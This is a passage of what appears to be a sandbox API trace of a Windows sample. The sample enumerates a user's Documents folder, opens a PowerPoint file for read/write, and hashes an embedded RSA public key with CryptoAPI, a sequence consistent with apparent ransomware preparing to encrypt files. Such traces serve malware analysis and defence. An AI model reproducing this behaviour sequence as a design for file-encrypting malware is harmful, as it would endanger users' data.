lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.372] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.374] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.374] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.375] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0184.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.376] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.377] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0184.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.378] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.378] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.379] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.379] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0184.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.380] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.380] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0184.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0184.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.382] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0184.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.382] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.383] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.383] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.383] PathFindFileNameW (pszPath="") returned="" [0184.383] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.383] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0184.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.384] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x992af670, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x992af670, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.384] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a64d6a0, ftCreationTime.dwHighDateTime=0x1d89e2d, ftLastAccessTime.dwLowDateTime=0xa52792e0, ftLastAccessTime.dwHighDateTime=0x1d8a38d, ftLastWriteTime.dwLowDateTime=0xa52792e0, ftLastWriteTime.dwHighDateTime=0x1d8a38d, nFileSizeHigh=0x0, nFileSizeLow=0xe607, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-yzSadt_8t CRoYRKO.pptx", cAlternateFileName="-YZSAD~1.PPT")) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.384] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0184.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31330 | out: hHeap=0x6a0000) returned 1 [0184.384] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\-yzSadt_8t CRoYRKO.pptx") returned=".pptx" [0184.384] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\-yzSadt_8t CRoYRKO.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\-yzsadt_8t croyrko.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.387] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=58887) returned 1 [0184.387] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.389] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe5e1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.389] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.392] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.392] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xe607, lpOverlapped=0x0) returned 1 [0184.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.393] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.393] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.394] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.394] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.394] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.394] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.394] GetLastError () returned 0x0 [0184.394] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.394] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.394] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.394] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.394] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.394] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xe610) returned 0x2d43778 [0184.395] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31330 [0184.395] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31378 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.396] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e918 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e978 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.399] GetCurrentThreadId () returned 0x264 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d369e8 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.400] GetCurrentThreadId () returned 0x264 [0184.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.400] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e978 [0184.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.401] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x6a0000, 